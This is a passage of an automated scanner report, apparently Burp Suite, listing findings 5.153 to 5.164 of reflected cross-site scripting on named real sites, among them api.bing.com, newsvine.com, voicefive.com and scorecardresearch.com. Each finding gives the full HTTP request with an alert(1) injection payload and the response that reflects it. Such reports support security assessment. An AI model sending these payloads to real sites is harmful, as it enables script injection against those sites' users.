User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351622**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Geec55"-alert(1)-"8b7e3018d80&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.153. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73e81"-alert(1)-"7c3420db156 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!73e81"-alert(1)-"7c3420db156&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351600**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!73e81"-alert(1)-"7c3420db156&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.154. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 987be"-alert(1)-"f02bf6e0775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&987be"-alert(1)-"f02bf6e0775=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:42:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1683

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&987be"-alert(1)-"f02bf6e0775=1">
...[SNIP]...

5.155. http://alex-johnson.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://alex-johnson.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e2c2"-alert(1)-"4c5f2da1b50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?3e2c2"-alert(1)-"4c5f2da1b50=1 HTTP/1.1
Host: alex-johnson.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=325847da6769430ff5ec3a6f9466c9cb; expires=Sat, 25-Jan-2031 17:50:14 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
;currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","2459049","http://alex-johnson.newsvine.com/?3e2c2"-alert(1)-"4c5f2da1b50=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.156. http://api.bing.com/qsonhs.aspx [&q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bing.com
Path:	/qsonhs.aspx

Issue detail

The value of the &q request parameter is copied into the HTML document as plain text between tags. The payload 5f28f<img%20src%3da%20onerror%3dalert(1)>355803a5d5d was submitted in the &q parameter. This input was echoed as 5f28f<img src=a onerror=alert(1)>355803a5d5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?&q=5f28f<img%20src%3da%20onerror%3dalert(1)>355803a5d5d HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: api.bing.com
Proxy-Connection: Keep-Alive
Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; SRCHD=MS=1593447&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=1

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 8d5672acb8274401a8f8673932dd8dc0
Date: Sat, 29 Jan 2011 23:44:59 GMT
Connection: close

{"AS":{"Query":"5f28f<img src=a onerror=alert(1)>355803a5d5d","FullResults":1}}

5.157. http://api.bing.com/qsonhs.aspx [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bing.com
Path:	/qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 15eaa<img%20src%3da%20onerror%3dalert(1)>f5303b63731 was submitted in the q parameter. This input was echoed as 15eaa<img src=a onerror=alert(1)>f5303b63731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?Form=&q=15eaa<img%20src%3da%20onerror%3dalert(1)>f5303b63731 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHD=MS=1615147&SM=1&D=1594248&AF=MSNH14; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 6d6a25edd817430d9e5d8b7e0aeaabaa
Date: Sun, 30 Jan 2011 14:48:40 GMT
Connection: close

{"AS":{"Query":"15eaa<img src=a onerror=alert(1)>f5303b63731","FullResults":1}}

5.158. http://ar.voicefive.com/b/rc.pli [func parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 82d4a<script>alert(1)</script>e75189b7ac2 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction82d4a<script>alert(1)</script>e75189b7ac2&n=ar_int_p85001580&1296351015841 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:23 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction82d4a<script>alert(1)</script>e75189b7ac2("");

5.159. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload 94aca<script>alert(1)</script>9dae726c61d was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=4040174094aca<script>alert(1)</script>9dae726c61d HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:22 2011&prad=58087454&arc=4040174094aca%3Cscript%3Ealert%281%29%3C%2Fscript%3E9dae726c61d&; expires=Sat 30-Apr-2011 01:40:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351622; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26660

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"4040174094aca<script>alert(1)</script>9dae726c61d",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("4040174094aca<script>
...[SNIP]...

5.160. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload c39c3<script>alert(1)</script>10cf109dd00 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454c39c3<script>alert(1)</script>10cf109dd00&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:21 2011&prad=58087454c39c3%3Cscript%3Ealert%281%29%3C%2Fscript%3E10cf109dd00&arc=40401740&; expires=Sat 30-Apr-2011 01:40:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351621; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26619

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454c39c3<script>alert(1)</script>10cf109dd00",Pid:"p85001580",Arc:"40401740",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("40401740"),Exp:COMSCORE.BMX.
...[SNIP]...

5.161. http://athima-chansanchai.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://athima-chansanchai.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a87ee"-alert(1)-"2c5f9f4d1a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?a87ee"-alert(1)-"2c5f9f4d1a4=1 HTTP/1.1
Host: athima-chansanchai.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=1d1d23b7294c7a0a950c54ae75d3a8dc; expires=Sat, 25-Jan-2031 17:50:30 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
ntCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","5001282","http://athima-chansanchai.newsvine.com/?a87ee"-alert(1)-"2c5f9f4d1a4=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.162. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 95074<script>alert(1)</script>d3dd0e1c31b was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=895074<script>alert(1)</script>d3dd0e1c31b&c2=6135404&c3=15&c4=13236&c5=&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"895074<script>alert(1)</script>d3dd0e1c31b", c2:"6135404", c3:"15", c4:"13236", c5:"", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.163. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 675cf<script>alert(1)</script>5524e2a163a was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=&c6=&c10=3203787675cf<script>alert(1)</script>5524e2a163a&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:01 GMT
Date: Sun, 30 Jan 2011 01:41:01 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"13236", c5:"", c6:"", c10:"3203787675cf<script>alert(1)</script>5524e2a163a", c15:"", c16:"", r:""});

5.164. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 56554<script>alert(1)</script>f33f0880492 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=&c6=&c10=3203787&c15=56554<script>alert(1)</script>f33f0880492 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:02 GMT
Date: Sun, 30 Jan 2011 01:41:02 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"13236", c5:"", c6:"", c10:"3203787", c15:"56554<script>alert(1)</script>f33f0880492", c16:"", r:""});

